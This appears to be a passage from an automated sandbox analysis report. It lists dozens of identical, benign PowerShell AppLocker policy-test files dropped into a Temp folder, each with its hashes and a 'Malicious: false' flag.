Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_djvkvjg4.x2s.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_djwbwiya.jsp.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dkroovhh.nfd.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_evpuv3s3.hjr.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f0a1blfz.eo2.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fkznpobu.buw.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gqfcix5p.j0d.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gsylugeb.qr5.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gvy32phb.igs.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i0djrwqq.par.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iet31hp0.f3b.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jf2uaf1l.muz.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jsxl4sde.tsu.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l21sxcya.utd.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lsjxnqzx.bi1.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mji0x2ym.13w.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mozz3ofm.cqz.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mseqm2md.wom.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n35ejblh.eei.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nneryj1s.3s5.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oir5v3gw.naa.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_omihv2jz.bda.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oqyke3xq.kxu.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pgn5o0u3.m05.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pu3gwd55.w3i.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pyqc3cw1.fx1.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_quqh31zb.3bd.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rnfcncse.xcf.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sa3nydts.h1a.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_setyvzcz.vit.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sj31uvvq.pz4.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tada5kgg.ulx.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tcyt5e4v.jko.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tunf0cl4.kge.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tv1hhvwe.fdi.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_umdftjsz.qon.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_upmctv1p.3h2.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
